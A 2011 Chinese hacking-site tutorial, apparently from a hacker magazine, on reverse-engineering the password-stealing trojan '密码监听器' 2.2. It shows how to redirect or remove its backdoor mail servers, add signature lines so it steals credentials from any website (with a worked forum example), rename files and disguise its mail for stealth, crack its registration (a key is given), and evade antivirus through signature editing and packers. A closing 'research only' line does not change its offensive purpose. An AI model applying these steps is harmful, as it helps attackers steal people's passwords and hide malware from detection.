发布时间:2011-06-26 06:05:15作者:知识屋
为了展示软件逆向工程的魅力和非凡的作用,这里向大家完整的讲解对密码监听器进行软件逆向的办法,嘿嘿,看看Crack过的黑客工具将是什么样的。
密 码监听器是一款优秀的密码截取木马类软件,它不但可以截取本机上的邮箱、部分网游、FTP、POP3的密码并发到指定邮箱,在集线器(HUB)的情况下, 它还能嗅探整个局域网内的密码信息。在本文中以密码监听器的作者网站上发布的最新版本为讲解对象,版本号为2.2,2004年4月3日的更新版本。逆向目 的:去除程序后门;增强软件功能,使其能截取几乎所有密码;修改软件参数,使之成为个人专版,更隐蔽;通过加工,使之逃过杀毒软件查杀。听起来非常诱惑很 大吧?哈哈,Come on baby!
去除程序后门
密码监听器虽然是个比较好的程序,但软件作者在此程序里设了后门,程序会将密码发送到软件作者的专门信箱。此后门采用 MX方式发信,安全性高,软件会自动连接http://freewebs.com/gameabc/smtp.txt获得软件作者设置的最新有效的MX发 信服务器地址。不过程序未加壳,我们直接用W32ASM对它进行分析就可以了,突破点也在这里。其中连接http://freewebs.com /gameabc/smtp.txt获得MX发信服务器IP地址的关键代码如下:
*Possible StringData Ref from Data Obj-->"://www."
:00405F7A 68B0664100 push 004166B0
:00405F7F 8D4DEC lea ecx,dword ptr [ebp-14]
* Reference TMFC42.Ordinal:03AD,Ord:03ADh
:00405F82 E837820000 Call 0040E1BE
*Possible StringData Ref from Data Obj-->"http://freewebs.com/gameabc/smtp.txt"
:00405F87 6890664100 push 00416690
:00405F8C 8D4DEC lea ecx,dword ptr [ebp-14]
……
我们用IE直接访问http://freewebs.com/gameabc/smtp.txt,看看有什么东西。
其中202.108.44.180为网易的MX发信服务器IP,999@xxx.com是作者在Mail from指令伪造的E-Mail地址。此软件作者通过网页实时更新的方法,确保了后门的有效性,再看反汇编代码分析程序,还会发现作者还留有一个后门 SMTP服务器,地址为card.bta.net.cn,看来作者真是想做到万无一失哦!
分析完毕,开始行动,有种简单的方法就是将其设置的后门 发信服务器均改为无效的地址。用WinHEX打开程序,查找http://freewebs.com/gameabc/smtp.txt,换为不存在的网 址,随便输入即可,注意字符长度不要超过原来的36位。接着查找card.bta.net.cn换为不存在的地址,如heike.fangxian。此步 骤就留给读者完成,没有什么难度的,这样就变成了自己的后门了。
TIPS:有读者朋友会直接想到把Smtp.txt地址以及后门信箱地址换为自己的,当然也可以,这样如果修改后的程序传播出去,无形中自己的后门可就多了很多哦——不过被人暴贬的几率也成几何级增长!慎重慎重,嘿嘿。
打造全能密码截取程序
现在我们来增强软件功能,使它能截取几乎所有密码。该软件采用特征码的方法来截取密码信息。比如窃取80端口的WEB密码的特征码就存放在Webfilter.txt里。
软件只能截取已经包含在特征码里的网站的密码,虽然软件作者已经加了许多著名的信箱、聊天室、论坛和网络游戏的特征码,但因为因特网变化日新月异, 有些大家想要记录的密码并不在此特征码文件中。其实我们可以自己增加特征码,加入想要截取密码的目标网址的特征码来扩展程序的功能。
下面就来讲讲特征码的格式及添加方法,拿原来Webfilter.tx中已有的特征码来讲解吧。比如:
2911.net|USERNAME=|USERNAME=;USERNAME=;PASSWORD=;网苑;http://www.2911.net/;1
查看登陆2911.net信箱的网页的HTML源代码,关键代码如下:
<form method="POST" action="http://mail.2911.net/cgi-bin/mail/main.pl">
<input type="hidden" name="LOGIN" value="Log In">
<tr>
<td height="220" width="271" align="right" valign="bottom" class="aa">用户名:</td>
<td height="220" width="154" valign="bottom">
<input type="text" class="cc" name="USERNAME" value="">
</td>
<td height="220" width="262" valign="bottom" class="bb">@2911.net</td>
</tr>
<tr>
<td height="43" width="271" align="right" valign="bottom" class="aa">密 码:</td>
<td height="43" width="154" valign="bottom">
<input type="password" class="cc" name="PASSWORD">
</td>
</tr>
特 征码中第一个2911.net应为提交表单Form标记中Action后面的一段网址的主要部分(比如1234.abcd.com特征码就取就是 abcd.com),密码监听器只要发现表单提交网址中含有2911.net就开始嗅探。USERNAME、PASSWORD分别为表单中Input域中 对应的Name名,而特征码最后面的网苑“;http://www.2911.net/;”则是密码监听器在监听列表以及发送的密码邮件中显示的注释内 容,特征码最后的阿拉伯数字则代表了所截获密码的类型,是邮箱还是聊天室还是游戏等等。
知道原理后我们就可以自己随意添加,增强功能了。这里就拿我的论坛做实验,验证可行性吧,网址为http://anyi.wegame.com。打开网站后查看原代码,找到关键表单HTML代码如下:
<form name="form1" method="post" action="http://xyzreg.wegame.com/index.php">
用户名<input type="text" name="ulogon" maxlength="35" size="8">
密码<input type="password" name="upass" maxlength="35" size="8">
<input type="submit" name="Submit" value="确定">
因而按照上面的原理分析,特征码应该为:
wegame.com|ulogon=|upass=;ulogon=;upass=;安翼论坛;http://anyi.wegame.com;4
测试成功。
大家可以按照以上方法自己填加新的特征码,这样就可以截取你任意想要的信箱、论坛、聊天室等密码了。
TIPS:FTP及POP3的特征码增添方法相似,并不难办到,它们的特征码分别在Ftpfilter.txt和Pop3filter.txt中,分别查找、替换就可以了。
打造超强隐蔽个人专版程序
更改程序的默认参数,该软件默认的WEB特征码文件为Webfilter.txt,配置文件为 Option.ini。为了增强程序的隐蔽性,我们可以将Webfilter.txt、Ftpfilter.txt、Pop3filter.txt、 Option.ini分别改为20041.mid、20042.mid、20043.mid、font.dat。
TIPS:在对这些文件改名时,一定别忘了在主程序Pswmonitor.exe中将其对应文件名一一替换,不然你的程序可是运行不起来的!
我们可以借助eXeScope来修改,这样方便一些。打开eXeScope,依次选择Resource—>string。
在右边的编辑框中可以很方便的将Webfilter.txt、ftpfilter.txt,pop3filter.txt,Option.in分别 改为20041.mid,20042.mid,20043.mid,font.dat。如图4的107-111中,懂HTML的朋友可以换掉密码监听器发 送密码信息时的版权内容以及邮件主题,这样能加大收信的准确率,不被提供E-mail的网站发觉。如图5中所示,可将密码监听器临时存放密码信息的位置 C:pswauto.htm换个隐蔽的路径及名字。还有一点值得注意的是该软件为共享软件,需要注册码。该程序很好破解,可采用动态调试或分析出算法来 得到注册码,也可爆破。相信这些大家都会,不再熬述。在此附带个该软件的注册码,以供不会破解的读者参考,用户名:chinesehack.org,注册 码:209432。
永不被杀
逃过杀毒软件查杀的方法有很多种。第一种方法是找程序入口点,算出相对偏移地址,查找16位偏移地址头,逐步试改特征码,可以选择 第150或第100块字段,然后将其归零另存,反复测试,直到程序既能正常运行又不被查杀为止,但这样手工做很繁,可以利用现在流行的AV Fengker来自动操作。第二种方法就是大家都熟悉的加壳法。要想完全躲过杀毒软件查杀,最好找ANTI和变异较厉害以及保护得较强的壳,如 XPR1.7,Pespin1.0,ExeStealth等,当然也可用些不常用的加壳软件。相信工具的使用大家都会吧,任选一种方法就可以了。
TIPS:本期专门有如何查找、分析后门、木马特征码的文章,有兴趣的朋友可以翻看Icefox的《杀毒软件能奈我何——网络神偷特征码修改实战》一文。
另外大家可用作者写的捆绑工具,把密码监听器的七个文件合并成一个EXE程序,这样就加强了程序的可用性。如果是使用密码监听器木马生成器的话,请 参照步骤3中的方法,用eXeScope把密码监听器木马生成器的默认参数改为和你在步骤3中设置的参数相同,相应文件名不能出错。
到这儿,软件逆向大功告成,一个属于自己的完美的密码监听器诞生了。本文所介绍的方法只供研究,勿用于破坏!
2011-07-02
黑客基础教程之如何查看论坛隐藏贴(怎么查看论坛隐藏贴)
一个黑客所需的基本技能
黑客基础教程之如何查看电脑配置(怎么查看自己的电脑配置)
怎么取消开机密码
什么是肉鸡,如何避免电脑成为肉鸡?
一名初级黑客所必须掌握的基本技能
电脑常见安全隐患,你知道吗?
黑客基础教程之黑客入侵渗透教程
【注意】QQ密码本地破解的原理和方法